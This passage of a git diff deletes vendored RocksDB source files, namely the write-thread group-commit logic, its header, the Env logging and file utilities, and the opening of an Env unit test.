-      w = next;
-    }
-    if (!leader->ShouldWriteToMemtable()) {
-      CompleteLeader(write_group);
-    }
-    // Link the ramaining of the group to memtable writer list.
-    if (write_group.size > 0) {
-      if (LinkGroup(write_group, &newest_memtable_writer_)) {
-        // The leader can now be different from current writer.
-        SetState(write_group.leader, STATE_MEMTABLE_WRITER_LEADER);
-      }
-    }
-    // Reset newest_writer_ and wake up the next leader.
-    Writer* newest_writer = last_writer;
-    if (!newest_writer_.compare_exchange_strong(newest_writer, nullptr)) {
-      Writer* next_leader = newest_writer;
-      while (next_leader->link_older != last_writer) {
-        next_leader = next_leader->link_older;
-        assert(next_leader != nullptr);
-      }
-      next_leader->link_older = nullptr;
-      SetState(next_leader, STATE_GROUP_LEADER);
-    }
-    AwaitState(leader, STATE_MEMTABLE_WRITER_LEADER |
-                           STATE_PARALLEL_MEMTABLE_WRITER | STATE_COMPLETED,
-               &eabgl_ctx);
-  } else {
-    Writer* head = newest_writer_.load(std::memory_order_acquire);
-    if (head != last_writer ||
-        !newest_writer_.compare_exchange_strong(head, nullptr)) {
-      // Either w wasn't the head during the load(), or it was the head
-      // during the load() but somebody else pushed onto the list before
-      // we did the compare_exchange_strong (causing it to fail).  In the
-      // latter case compare_exchange_strong has the effect of re-reading
-      // its first param (head).  No need to retry a failing CAS, because
-      // only a departing leader (which we are at the moment) can remove
-      // nodes from the list.
-      assert(head != last_writer);
-
-      // After walking link_older starting from head (if not already done)
-      // we will be able to traverse w->link_newer below. This function
-      // can only be called from an active leader, only a leader can
-      // clear newest_writer_, we didn't, and only a clear newest_writer_
-      // could cause the next leader to start their work without a call
-      // to MarkJoined, so we can definitely conclude that no other leader
-      // work is going on here (with or without db mutex).
-      CreateMissingNewerLinks(head);
-      assert(last_writer->link_newer->link_older == last_writer);
-      last_writer->link_newer->link_older = nullptr;
-
-      // Next leader didn't self-identify, because newest_writer_ wasn't
-      // nullptr when they enqueued (we were definitely enqueued before them
-      // and are still in the list).  That means leader handoff occurs when
-      // we call MarkJoined
-      SetState(last_writer->link_newer, STATE_GROUP_LEADER);
-    }
-    // else nobody else was waiting, although there might already be a new
-    // leader now
-
-    while (last_writer != leader) {
-      last_writer->status = status;
-      // we need to read link_older before calling SetState, because as soon
-      // as it is marked committed the other thread's Await may return and
-      // deallocate the Writer.
-      auto next = last_writer->link_older;
-      SetState(last_writer, STATE_COMPLETED);
-
-      last_writer = next;
-    }
-  }
-}
-
-static WriteThread::AdaptationContext eu_ctx("EnterUnbatched");
-void WriteThread::EnterUnbatched(Writer* w, InstrumentedMutex* mu) {
-  assert(w != nullptr && w->batch == nullptr);
-  mu->Unlock();
-  bool linked_as_leader = LinkOne(w, &newest_writer_);
-  if (!linked_as_leader) {
-    TEST_SYNC_POINT("WriteThread::EnterUnbatched:Wait");
-    // Last leader will not pick us as a follower since our batch is nullptr
-    AwaitState(w, STATE_GROUP_LEADER, &eu_ctx);
-  }
-  if (enable_pipelined_write_) {
-    WaitForMemTableWriters();
-  }
-  mu->Lock();
-}
-
-void WriteThread::ExitUnbatched(Writer* w) {
-  assert(w != nullptr);
-  Writer* newest_writer = w;
-  if (!newest_writer_.compare_exchange_strong(newest_writer, nullptr)) {
-    CreateMissingNewerLinks(newest_writer);
-    Writer* next_leader = w->link_newer;
-    assert(next_leader != nullptr);
-    next_leader->link_older = nullptr;
-    SetState(next_leader, STATE_GROUP_LEADER);
-  }
-}
-
-static WriteThread::AdaptationContext wfmw_ctx("WaitForMemTableWriters");
-void WriteThread::WaitForMemTableWriters() {
-  assert(enable_pipelined_write_);
-  if (newest_memtable_writer_.load() == nullptr) {
-    return;
-  }
-  Writer w;
-  if (!LinkOne(&w, &newest_memtable_writer_)) {
-    AwaitState(&w, STATE_MEMTABLE_WRITER_LEADER, &wfmw_ctx);
-  }
-  newest_memtable_writer_.store(nullptr);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_thread.h b/thirdparty/rocksdb/db/write_thread.h
deleted file mode 100644
index 57ce71e..0000000
--- a/thirdparty/rocksdb/db/write_thread.h
+++ /dev/null
@@ -1,391 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <assert.h>
-#include <stdint.h>
-#include <atomic>
-#include <chrono>
-#include <condition_variable>
-#include <mutex>
-#include <type_traits>
-#include <vector>
-
-#include "db/write_callback.h"
-#include "monitoring/instrumented_mutex.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/write_batch.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class WriteThread {
- public:
-  enum State : uint8_t {
-    // The initial state of a writer.  This is a Writer that is
-    // waiting in JoinBatchGroup.  This state can be left when another
-    // thread informs the waiter that it has become a group leader
-    // (-> STATE_GROUP_LEADER), when a leader that has chosen to be
-    // non-parallel informs a follower that its writes have been committed
-    // (-> STATE_COMPLETED), or when a leader that has chosen to perform
-    // updates in parallel and needs this Writer to apply its batch (->
-    // STATE_PARALLEL_FOLLOWER).
-    STATE_INIT = 1,
-
-    // The state used to inform a waiting Writer that it has become the
-    // leader, and it should now build a write batch group.  Tricky:
-    // this state is not used if newest_writer_ is empty when a writer
-    // enqueues itself, because there is no need to wait (or even to
-    // create the mutex and condvar used to wait) in that case.  This is
-    // a terminal state unless the leader chooses to make this a parallel
-    // batch, in which case the last parallel worker to finish will move
-    // the leader to STATE_COMPLETED.
-    STATE_GROUP_LEADER = 2,
-
-    // The state used to inform a waiting writer that it has become the
-    // leader of memtable writer group. The leader will either write
-    // memtable for the whole group, or launch a parallel group write
-    // to memtable by calling LaunchParallelMemTableWrite.
-    STATE_MEMTABLE_WRITER_LEADER = 4,
-
-    // The state used to inform a waiting writer that it has become a
-    // parallel memtable writer. It can be the group leader who launch the
-    // parallel writer group, or one of the followers. The writer should then
-    // apply its batch to the memtable concurrently and call
-    // CompleteParallelMemTableWriter.
-    STATE_PARALLEL_MEMTABLE_WRITER = 8,
-
-    // A follower whose writes have been applied, or a parallel leader
-    // whose followers have all finished their work.  This is a terminal
-    // state.
-    STATE_COMPLETED = 16,
-
-    // A state indicating that the thread may be waiting using StateMutex()
-    // and StateCondVar()
-    STATE_LOCKED_WAITING = 32,
-  };
-
-  struct Writer;
-
-  struct WriteGroup {
-    Writer* leader = nullptr;
-    Writer* last_writer = nullptr;
-    SequenceNumber last_sequence;
-    // before running goes to zero, status needs leader->StateMutex()
-    Status status;
-    std::atomic<size_t> running;
-    size_t size = 0;
-
-    struct Iterator {
-      Writer* writer;
-      Writer* last_writer;
-
-      explicit Iterator(Writer* w, Writer* last)
-          : writer(w), last_writer(last) {}
-
-      Writer* operator*() const { return writer; }
-
-      Iterator& operator++() {
-        assert(writer != nullptr);
-        if (writer == last_writer) {
-          writer = nullptr;
-        } else {
-          writer = writer->link_newer;
-        }
-        return *this;
-      }
-
-      bool operator!=(const Iterator& other) const {
-        return writer != other.writer;
-      }
-    };
-
-    Iterator begin() const { return Iterator(leader, last_writer); }
-    Iterator end() const { return Iterator(nullptr, nullptr); }
-  };
-
-  // Information kept for every waiting writer.
-  struct Writer {
-    WriteBatch* batch;
-    bool sync;
-    bool no_slowdown;
-    bool disable_wal;
-    bool disable_memtable;
-    uint64_t log_used;  // log number that this batch was inserted into
-    uint64_t log_ref;   // log number that memtable insert should reference
-    WriteCallback* callback;
-    bool made_waitable;          // records lazy construction of mutex and cv
-    std::atomic<uint8_t> state;  // write under StateMutex() or pre-link
-    WriteGroup* write_group;
-    SequenceNumber sequence;  // the sequence number to use for the first key
-    Status status;            // status of memtable inserter
-    Status callback_status;   // status returned by callback->Callback()
-    std::aligned_storage<sizeof(std::mutex)>::type state_mutex_bytes;
-    std::aligned_storage<sizeof(std::condition_variable)>::type state_cv_bytes;
-    Writer* link_older;  // read/write only before linking, or as leader
-    Writer* link_newer;  // lazy, read/write only before linking, or as leader
-
-    Writer()
-        : batch(nullptr),
-          sync(false),
-          no_slowdown(false),
-          disable_wal(false),
-          disable_memtable(false),
-          log_used(0),
-          log_ref(0),
-          callback(nullptr),
-          made_waitable(false),
-          state(STATE_INIT),
-          write_group(nullptr),
-          link_older(nullptr),
-          link_newer(nullptr) {}
-
-    Writer(const WriteOptions& write_options, WriteBatch* _batch,
-           WriteCallback* _callback, uint64_t _log_ref, bool _disable_memtable)
-        : batch(_batch),
-          sync(write_options.sync),
-          no_slowdown(write_options.no_slowdown),
-          disable_wal(write_options.disableWAL),
-          disable_memtable(_disable_memtable),
-          log_used(0),
-          log_ref(_log_ref),
-          callback(_callback),
-          made_waitable(false),
-          state(STATE_INIT),
-          write_group(nullptr),
-          link_older(nullptr),
-          link_newer(nullptr) {}
-
-    ~Writer() {
-      if (made_waitable) {
-        StateMutex().~mutex();
-        StateCV().~condition_variable();
-      }
-    }
-
-    bool CheckCallback(DB* db) {
-      if (callback != nullptr) {
-        callback_status = callback->Callback(db);
-      }
-      return callback_status.ok();
-    }
-
-    void CreateMutex() {
-      if (!made_waitable) {
-        // Note that made_waitable is tracked separately from state
-        // transitions, because we can't atomically create the mutex and
-        // link into the list.
-        made_waitable = true;
-        new (&state_mutex_bytes) std::mutex;
-        new (&state_cv_bytes) std::condition_variable;
-      }
-    }
-
-    // returns the aggregate status of this Writer
-    Status FinalStatus() {
-      if (!status.ok()) {
-        // a non-ok memtable write status takes presidence
-        assert(callback == nullptr || callback_status.ok());
-        return status;
-      } else if (!callback_status.ok()) {
-        // if the callback failed then that is the status we want
-        // because a memtable insert should not have been attempted
-        assert(callback != nullptr);
-        assert(status.ok());
-        return callback_status;
-      } else {
-        // if there is no callback then we only care about
-        // the memtable insert status
-        assert(callback == nullptr || callback_status.ok());
-        return status;
-      }
-    }
-
-    bool CallbackFailed() {
-      return (callback != nullptr) && !callback_status.ok();
-    }
-
-    bool ShouldWriteToMemtable() {
-      return status.ok() && !CallbackFailed() && !disable_memtable;
-    }
-
-    bool ShouldWriteToWAL() {
-      return status.ok() && !CallbackFailed() && !disable_wal;
-    }
-
-    // No other mutexes may be acquired while holding StateMutex(), it is
-    // always last in the order
-    std::mutex& StateMutex() {
-      assert(made_waitable);
-      return *static_cast<std::mutex*>(static_cast<void*>(&state_mutex_bytes));
-    }
-
-    std::condition_variable& StateCV() {
-      assert(made_waitable);
-      return *static_cast<std::condition_variable*>(
-                 static_cast<void*>(&state_cv_bytes));
-    }
-  };
-
-  struct AdaptationContext {
-    const char* name;
-    std::atomic<int32_t> value;
-
-    explicit AdaptationContext(const char* name0) : name(name0), value(0) {}
-  };
-
-  explicit WriteThread(const ImmutableDBOptions& db_options);
-
-  virtual ~WriteThread() = default;
-
-  // IMPORTANT: None of the methods in this class rely on the db mutex
-  // for correctness. All of the methods except JoinBatchGroup and
-  // EnterUnbatched may be called either with or without the db mutex held.
-  // Correctness is maintained by ensuring that only a single thread is
-  // a leader at a time.
-
-  // Registers w as ready to become part of a batch group, waits until the
-  // caller should perform some work, and returns the current state of the
-  // writer.  If w has become the leader of a write batch group, returns
-  // STATE_GROUP_LEADER.  If w has been made part of a sequential batch
-  // group and the leader has performed the write, returns STATE_DONE.
-  // If w has been made part of a parallel batch group and is responsible
-  // for updating the memtable, returns STATE_PARALLEL_FOLLOWER.
-  //
-  // The db mutex SHOULD NOT be held when calling this function, because
-  // it will block.
-  //
-  // Writer* w:        Writer to be executed as part of a batch group
-  void JoinBatchGroup(Writer* w);
-
-  // Constructs a write batch group led by leader, which should be a
-  // Writer passed to JoinBatchGroup on the current thread.
-  //
-  // Writer* leader:          Writer that is STATE_GROUP_LEADER
-  // WriteGroup* write_group: Out-param of group members
-  // returns:                 Total batch group byte size
-  size_t EnterAsBatchGroupLeader(Writer* leader, WriteGroup* write_group);
-
-  // Unlinks the Writer-s in a batch group, wakes up the non-leaders,
-  // and wakes up the next leader (if any).
-  //
-  // WriteGroup* write_group: the write group
-  // Status status:           Status of write operation
-  void ExitAsBatchGroupLeader(WriteGroup& write_group, Status status);
-
-  // Exit batch group on behalf of batch group leader.
-  void ExitAsBatchGroupFollower(Writer* w);
-
-  // Constructs a write batch group led by leader from newest_memtable_writers_
-  // list. The leader should either write memtable for the whole group and
-  // call ExitAsMemTableWriter, or launch parallel memtable write through
-  // LaunchParallelMemTableWriters.
-  void EnterAsMemTableWriter(Writer* leader, WriteGroup* write_grup);
-
-  // Memtable writer group leader, or the last finished writer in a parallel
-  // write group, exit from the newest_memtable_writers_ list, and wake up
-  // the next leader if needed.
-  void ExitAsMemTableWriter(Writer* self, WriteGroup& write_group);
-
-  // Causes JoinBatchGroup to return STATE_PARALLEL_FOLLOWER for all of the
-  // non-leader members of this write batch group.  Sets Writer::sequence
-  // before waking them up.
-  //
-  // WriteGroup* write_group: Extra state used to coordinate the parallel add
-  void LaunchParallelMemTableWriters(WriteGroup* write_group);
-
-  // Reports the completion of w's batch to the parallel group leader, and
-  // waits for the rest of the parallel batch to complete.  Returns true
-  // if this thread is the last to complete, and hence should advance
-  // the sequence number and then call EarlyExitParallelGroup, false if
-  // someone else has already taken responsibility for that.
-  bool CompleteParallelMemTableWriter(Writer* w);
-
-  // Waits for all preceding writers (unlocking mu while waiting), then
-  // registers w as the currently proceeding writer.
-  //
-  // Writer* w:              A Writer not eligible for batching
-  // InstrumentedMutex* mu:  The db mutex, to unlock while waiting
-  // REQUIRES: db mutex held
-  void EnterUnbatched(Writer* w, InstrumentedMutex* mu);
-
-  // Completes a Writer begun with EnterUnbatched, unblocking subsequent
-  // writers.
-  void ExitUnbatched(Writer* w);
-
-  // Wait for all parallel memtable writers to finish, in case pipelined
-  // write is enabled.
-  void WaitForMemTableWriters();
-
-  SequenceNumber UpdateLastSequence(SequenceNumber sequence) {
-    if (sequence > last_sequence_) {
-      last_sequence_ = sequence;
-    }
-    return last_sequence_;
-  }
-
- private:
-  // See AwaitState.
-  const uint64_t max_yield_usec_;
-  const uint64_t slow_yield_usec_;
-
-  // Allow multiple writers write to memtable concurrently.
-  const bool allow_concurrent_memtable_write_;
-
-  // Enable pipelined write to WAL and memtable.
-  const bool enable_pipelined_write_;
-
-  // Points to the newest pending writer. Only leader can remove
-  // elements, adding can be done lock-free by anybody.
-  std::atomic<Writer*> newest_writer_;
-
-  // Points to the newest pending memtable writer. Used only when pipelined
-  // write is enabled.
-  std::atomic<Writer*> newest_memtable_writer_;
-
-  // The last sequence that have been consumed by a writer. The sequence
-  // is not necessary visible to reads because the writer can be ongoing.
-  SequenceNumber last_sequence_;
-
-  // Waits for w->state & goal_mask using w->StateMutex().  Returns
-  // the state that satisfies goal_mask.
-  uint8_t BlockingAwaitState(Writer* w, uint8_t goal_mask);
-
-  // Blocks until w->state & goal_mask, returning the state value
-  // that satisfied the predicate.  Uses ctx to adaptively use
-  // std::this_thread::yield() to avoid mutex overheads.  ctx should be
-  // a context-dependent static.
-  uint8_t AwaitState(Writer* w, uint8_t goal_mask, AdaptationContext* ctx);
-
-  // Set writer state and wake the writer up if it is waiting.
-  void SetState(Writer* w, uint8_t new_state);
-
-  // Links w into the newest_writer list. Return true if w was linked directly
-  // into the leader position.  Safe to call from multiple threads without
-  // external locking.
-  bool LinkOne(Writer* w, std::atomic<Writer*>* newest_writer);
-
-  // Link write group into the newest_writer list as a whole, while keeping the
-  // order of the writers unchanged. Return true if the group was linked
-  // directly into the leader position.
-  bool LinkGroup(WriteGroup& write_group, std::atomic<Writer*>* newest_writer);
-
-  // Computes any missing link_newer links.  Should not be called
-  // concurrently with itself.
-  void CreateMissingNewerLinks(Writer* head);
-
-  // Set the leader in write_group to completed state and remove it from the
-  // write group.
-  void CompleteLeader(WriteGroup& write_group);
-
-  // Set a follower in write_group to completed state and remove it from the
-  // write group.
-  void CompleteFollower(Writer* w, WriteGroup& write_group);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/env.cc b/thirdparty/rocksdb/env/env.cc
deleted file mode 100644
index ae0b111..0000000
--- a/thirdparty/rocksdb/env/env.cc
+++ /dev/null
@@ -1,381 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/env.h"
-
-#include <thread>
-#include "options/db_options.h"
-#include "port/port.h"
-#include "port/sys_time.h"
-#include "rocksdb/options.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-Env::~Env() {
-}
-
-uint64_t Env::GetThreadID() const {
-  std::hash<std::thread::id> hasher;
-  return hasher(std::this_thread::get_id());
-}
-
-Status Env::ReuseWritableFile(const std::string& fname,
-                              const std::string& old_fname,
-                              unique_ptr<WritableFile>* result,
-                              const EnvOptions& options) {
-  Status s = RenameFile(old_fname, fname);
-  if (!s.ok()) {
-    return s;
-  }
-  return NewWritableFile(fname, result, options);
-}
-
-Status Env::GetChildrenFileAttributes(const std::string& dir,
-                                      std::vector<FileAttributes>* result) {
-  assert(result != nullptr);
-  std::vector<std::string> child_fnames;
-  Status s = GetChildren(dir, &child_fnames);
-  if (!s.ok()) {
-    return s;
-  }
-  result->resize(child_fnames.size());
-  size_t result_size = 0;
-  for (size_t i = 0; i < child_fnames.size(); ++i) {
-    const std::string path = dir + "/" + child_fnames[i];
-    if (!(s = GetFileSize(path, &(*result)[result_size].size_bytes)).ok()) {
-      if (FileExists(path).IsNotFound()) {
-        // The file may have been deleted since we listed the directory
-        continue;
-      }
-      return s;
-    }
-    (*result)[result_size].name = std::move(child_fnames[i]);
-    result_size++;
-  }
-  result->resize(result_size);
-  return Status::OK();
-}
-
-SequentialFile::~SequentialFile() {
-}
-
-RandomAccessFile::~RandomAccessFile() {
-}
-
-WritableFile::~WritableFile() {
-}
-
-Logger::~Logger() {
-}
-
-FileLock::~FileLock() {
-}
-
-void LogFlush(Logger *info_log) {
-  if (info_log) {
-    info_log->Flush();
-  }
-}
-
-void Log(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::INFO_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::INFO_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Logger::Logv(const InfoLogLevel log_level, const char* format, va_list ap) {
-  static const char* kInfoLogLevelNames[5] = { "DEBUG", "INFO", "WARN",
-    "ERROR", "FATAL" };
-  if (log_level < log_level_) {
-    return;
-  }
-
-  if (log_level == InfoLogLevel::INFO_LEVEL) {
-    // Doesn't print log level if it is INFO level.
-    // This is to avoid unexpected performance regression after we add
-    // the feature of log level. All the logs before we add the feature
-    // are INFO level. We don't want to add extra costs to those existing
-    // logging.
-    Logv(format, ap);
-  } else {
-    char new_format[500];
-    snprintf(new_format, sizeof(new_format) - 1, "[%s] %s",
-      kInfoLogLevelNames[log_level], format);
-    Logv(new_format, ap);
-  }
-}
-
-
-void Log(const InfoLogLevel log_level, Logger* info_log, const char* format,
-         ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= log_level) {
-    va_list ap;
-    va_start(ap, format);
-
-    if (log_level == InfoLogLevel::HEADER_LEVEL) {
-      info_log->LogHeader(format, ap);
-    } else {
-      info_log->Logv(log_level, format, ap);
-    }
-
-    va_end(ap);
-  }
-}
-
-void Header(Logger* info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->LogHeader(format, ap);
-    va_end(ap);
-  }
-}
-
-void Debug(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::DEBUG_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::DEBUG_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Info(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::INFO_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::INFO_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Warn(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::WARN_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::WARN_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-void Error(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::ERROR_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::ERROR_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-void Fatal(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::FATAL_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::FATAL_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void LogFlush(const shared_ptr<Logger>& info_log) {
-  if (info_log) {
-    info_log->Flush();
-  }
-}
-
-void Log(const InfoLogLevel log_level, const shared_ptr<Logger>& info_log,
-         const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(log_level, format, ap);
-    va_end(ap);
-  }
-}
-
-void Header(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->LogHeader(format, ap);
-    va_end(ap);
-  }
-}
-
-void Debug(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::DEBUG_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Info(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::INFO_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Warn(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::WARN_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Error(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::ERROR_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Fatal(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::FATAL_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Log(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::INFO_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-Status WriteStringToFile(Env* env, const Slice& data, const std::string& fname,
-                         bool should_sync) {
-  unique_ptr<WritableFile> file;
-  EnvOptions soptions;
-  Status s = env->NewWritableFile(fname, &file, soptions);
-  if (!s.ok()) {
-    return s;
-  }
-  s = file->Append(data);
-  if (s.ok() && should_sync) {
-    s = file->Sync();
-  }
-  if (!s.ok()) {
-    env->DeleteFile(fname);
-  }
-  return s;
-}
-
-Status ReadFileToString(Env* env, const std::string& fname, std::string* data) {
-  EnvOptions soptions;
-  data->clear();
-  unique_ptr<SequentialFile> file;
-  Status s = env->NewSequentialFile(fname, &file, soptions);
-  if (!s.ok()) {
-    return s;
-  }
-  static const int kBufferSize = 8192;
-  char* space = new char[kBufferSize];
-  while (true) {
-    Slice fragment;
-    s = file->Read(kBufferSize, &fragment, space);
-    if (!s.ok()) {
-      break;
-    }
-    data->append(fragment.data(), fragment.size());
-    if (fragment.empty()) {
-      break;
-    }
-  }
-  delete[] space;
-  return s;
-}
-
-EnvWrapper::~EnvWrapper() {
-}
-
-namespace {  // anonymous namespace
-
-void AssignEnvOptions(EnvOptions* env_options, const DBOptions& options) {
-  env_options->use_mmap_reads = options.allow_mmap_reads;
-  env_options->use_mmap_writes = options.allow_mmap_writes;
-  env_options->use_direct_reads = options.use_direct_reads;
-  env_options->set_fd_cloexec = options.is_fd_close_on_exec;
-  env_options->bytes_per_sync = options.bytes_per_sync;
-  env_options->compaction_readahead_size = options.compaction_readahead_size;
-  env_options->random_access_max_buffer_size =
-      options.random_access_max_buffer_size;
-  env_options->rate_limiter = options.rate_limiter.get();
-  env_options->writable_file_max_buffer_size =
-      options.writable_file_max_buffer_size;
-  env_options->allow_fallocate = options.allow_fallocate;
-}
-
-}
-
-EnvOptions Env::OptimizeForLogWrite(const EnvOptions& env_options,
-                                    const DBOptions& db_options) const {
-  EnvOptions optimized_env_options(env_options);
-  optimized_env_options.bytes_per_sync = db_options.wal_bytes_per_sync;
-  return optimized_env_options;
-}
-
-EnvOptions Env::OptimizeForManifestWrite(const EnvOptions& env_options) const {
-  return env_options;
-}
-
-EnvOptions Env::OptimizeForLogRead(const EnvOptions& env_options) const {
-  EnvOptions optimized_env_options(env_options);
-  optimized_env_options.use_direct_reads = false;
-  return optimized_env_options;
-}
-
-EnvOptions Env::OptimizeForManifestRead(const EnvOptions& env_options) const {
-  EnvOptions optimized_env_options(env_options);
-  optimized_env_options.use_direct_reads = false;
-  return optimized_env_options;
-}
-
-EnvOptions Env::OptimizeForCompactionTableWrite(
-    const EnvOptions& env_options, const ImmutableDBOptions& db_options) const {
-  EnvOptions optimized_env_options(env_options);
-  optimized_env_options.use_direct_writes =
-      db_options.use_direct_io_for_flush_and_compaction;
-  return optimized_env_options;
-}
-
-EnvOptions Env::OptimizeForCompactionTableRead(
-    const EnvOptions& env_options, const ImmutableDBOptions& db_options) const {
-  EnvOptions optimized_env_options(env_options);
-  optimized_env_options.use_direct_reads =
-      db_options.use_direct_io_for_flush_and_compaction;
-  return optimized_env_options;
-}
-
-EnvOptions::EnvOptions(const DBOptions& options) {
-  AssignEnvOptions(this, options);
-}
-
-EnvOptions::EnvOptions() {
-  DBOptions options;
-  AssignEnvOptions(this, options);
-}
-
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/env_basic_test.cc b/thirdparty/rocksdb/env/env_basic_test.cc
deleted file mode 100644
index 254c71f..0000000
--- a/thirdparty/rocksdb/env/env_basic_test.cc
+++ /dev/null
@@ -1,356 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <memory>
-#include <string>
-#include <vector>
-#include <algorithm>
-
-#include "env/mock_env.h"
-#include "rocksdb/env.h"
-#include "rocksdb/utilities/object_registry.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-// Normalizes trivial differences across Envs such that these test cases can
-// run on all Envs.
-class NormalizingEnvWrapper : public EnvWrapper {
- public:
-  explicit NormalizingEnvWrapper(Env* base) : EnvWrapper(base) {}
-
-  // Removes . and .. from directory listing
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) override {
-    Status status = EnvWrapper::GetChildren(dir, result);
-    if (status.ok()) {
-      result->erase(std::remove_if(result->begin(), result->end(),
-                                   [](const std::string& s) {
-                                     return s == "." || s == "..";
-                                   }),
-                    result->end());
-    }
-    return status;
-  }
-
-  // Removes . and .. from directory listing
-  virtual Status GetChildrenFileAttributes(
-      const std::string& dir, std::vector<FileAttributes>* result) override {
-    Status status = EnvWrapper::GetChildrenFileAttributes(dir, result);
-    if (status.ok()) {
-      result->erase(std::remove_if(result->begin(), result->end(),
-                                   [](const FileAttributes& fa) {
-                                     return fa.name == "." || fa.name == "..";
-                                   }),
-                    result->end());
-    }
-    return status;
-  }
-};
-
-class EnvBasicTestWithParam : public testing::Test,
-                              public ::testing::WithParamInterface<Env*> {
- public:
-  Env* env_;
-  const EnvOptions soptions_;
-  std::string test_dir_;
-
-  EnvBasicTestWithParam() : env_(GetParam()) {
-    test_dir_ = test::TmpDir(env_) + "/env_basic_test";
-  }
-
-  void SetUp() {
-    env_->CreateDirIfMissing(test_dir_);
-  }
-
-  void TearDown() {
-    std::vector<std::string> files;
-    env_->GetChildren(test_dir_, &files);
-    for (const auto& file : files) {
-      // don't know whether it's file or directory, try both. The tests must
-      // only create files or empty directories, so one must succeed, else the
-      // directory's corrupted.
-      Status s = env_->DeleteFile(test_dir_ + "/" + file);
-      if (!s.ok()) {
-        ASSERT_OK(env_->DeleteDir(test_dir_ + "/" + file));
-      }
-    }
-  }
-};
-
-class EnvMoreTestWithParam : public EnvBasicTestWithParam {};
-
-static std::unique_ptr<Env> def_env(new NormalizingEnvWrapper(Env::Default()));
-INSTANTIATE_TEST_CASE_P(EnvDefault, EnvBasicTestWithParam,
-                        ::testing::Values(def_env.get()));
-INSTANTIATE_TEST_CASE_P(EnvDefault, EnvMoreTestWithParam,
-                        ::testing::Values(def_env.get()));
-
-static std::unique_ptr<Env> mock_env(new MockEnv(Env::Default()));
-INSTANTIATE_TEST_CASE_P(MockEnv, EnvBasicTestWithParam,
-                        ::testing::Values(mock_env.get()));
-#ifndef ROCKSDB_LITE
-static std::unique_ptr<Env> mem_env(NewMemEnv(Env::Default()));
-INSTANTIATE_TEST_CASE_P(MemEnv, EnvBasicTestWithParam,
-                        ::testing::Values(mem_env.get()));
-
-namespace {
-
